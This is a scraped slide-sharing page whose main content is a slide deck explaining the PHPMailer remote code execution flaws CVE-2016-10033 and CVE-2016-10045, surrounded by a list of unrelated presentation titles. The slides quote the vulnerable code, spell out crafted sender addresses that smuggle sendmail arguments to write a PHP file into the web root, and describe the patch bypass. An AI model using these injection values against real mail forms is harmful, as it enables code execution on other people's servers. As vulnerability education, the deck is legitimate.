State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
 
Introduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - CybersecurityIntroduction to CHERI technology - Cybersecurity
Introduction to CHERI technology - Cybersecurity
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
 
Welocme to ViralQR, your best QR code generator.
Welocme to ViralQR, your best QR code generator.Welocme to ViralQR, your best QR code generator.
Welocme to ViralQR, your best QR code generator.
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
 

PHP Mailer Remote Code Execution

  • 1. PHP MAILER REMOTE CODE EXECUTION CVE-2016-10033, CVE-2016-10045 NEELU TRIPATHY
  • 2. PHP MAILER • Most Popular Code For Sending Email From PHP! • Used By Many Open-source Projects: Wordpress, Drupal, 1crm, Sugar CRM, Joomla! And Many More • Cve-2016-10033 • Affected Versions : < 5.2.18 • Exploit Variants Available In Bash, PHP & Python
  • 3. Where To Look? • To Exploit The Vulnerability An Attacker Could Target Common Website Components Such As: • Contact/Feedback Forms, • Registration Forms, • Password Email Resets • And Others That Send Out Emails With The Help Of A Vulnerable Version Of ‘Phpmailer’ Class…
  • 4. VULNERABLE CODE protected function mailsend($header, $body) { $toarr = array(); foreach ($this->to as $toaddr) { $toarr[] = $this->addrformat($toaddr); } $to = implode(', ', $toarr); $params = null; //this sets the smtp envelope sender which gets turned into a return-path header by the receiver if (!empty($this->sender)) { $params = sprintf('-f%s', $this->sender); } if ($this->sender != '' and !ini_get('safe_mode')) { $old_from = ini_get('sendmail_from'); ini_set('sendmail_from', $this->sender); } $result = false; if ($this->singleto and count($toarr) > 1) { foreach ($toarr as $toaddr) { $result = $this->mailpassthru($toaddr, $this- >subject, $body, $header, $params);
  • 5. What’s Next • $Params = Sprintf('-f%s', $This->sender); //Function.Mail.Php • Public Function Setfrom($address, $Name = '', $Auto = True) // Sender Address Verification • RFC 3696 Specification: Allows Email To Contain Spaces “Attacker Crafted Command As Email”@fakeemail.Com $result = $this->mailpassthru($toaddr, $this- >subject, $body, $header, $params);
  • 6. CRAFTING THE VECTOR "attacker -param2 -param3"@test.com • arg no. 0 == [/usr/sbin/sendmail] • arg no. 1 == [-t] • arg no. 2 == [-i] • arg no. 3 == [-fattacker -param2 - param3@test.com] "attacker " -param2 -param3"@test.com • arg no. 0 == [/usr/sbin/sendmail] • arg no. 1 == [-t] • arg no. 2 == [-i] • arg no. 3 == [-fattacker] • arg no. 4 == [-param2] • arg no. 5 == [-param3"@test.com]
  • 7. FINAL SEND(ER) • $email_from = '"attacker" -oq/tmp/ - x/var/www/cache/phpcode.php some"@email.com'; • $msg_body = "<?php phpinfo(); ?>"; //can't use additional_parameters in safe_mode //@link http://php.net/manual/en/function.mail.php if (ini_get('safe_mode') or !$this- >usesendmailoptions or is_null($params)) { $result = @mail($to, $subject, $body, $header); } else { $result = @mail($to, $subject, $body, $header, $params); }
  • 10. CVE-2016-10045 PATCH Sanitize $Sender > Apply Escapeshellarg() : Escaping Before The Value Is Passed To Mail() escapeshellarg() escapeshellcmd() https://legalhackers.com/advisories/PHPMailer- Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln- Patch-Bypass.html
  • 11. Phpmailer 5.2.18-19 • Extra Quote • Patched But Vulnerable: Phpmailer 5.2.18-19 • $Mail- >setfrom(""attacker' - Param2 -Param3"@test.Com", 'Client Name'); Arg no. 0 == [/usr/sbin/sendmail] Arg no. 1 == [-t] Arg no. 2 == [-i] Arg no. 3 == [-f"Attacker] Arg no. 4 == [-Param2] Arg no. 5 == [-Param3"@test.com'] Modified Attacker Code
  • 12. REFERENCES • https://github.com/PHPMailer/PHPMailer • https://legalhackers.com/advisories/phpmailer-exploit- remote-code-exec-cve-2016-10045-vuln-patch-bypass.html • https://www.exploit-db.com/exploits/40968/ • https://www.exploit-db.com/exploits/40969/ • https://github.com/opsxcq/exploit-cve-2016-10033 • https://legalhackers.com/advisories/phpmailer-exploit- remote-code-exec-cve-2016-10033-vuln.html THANK YOU!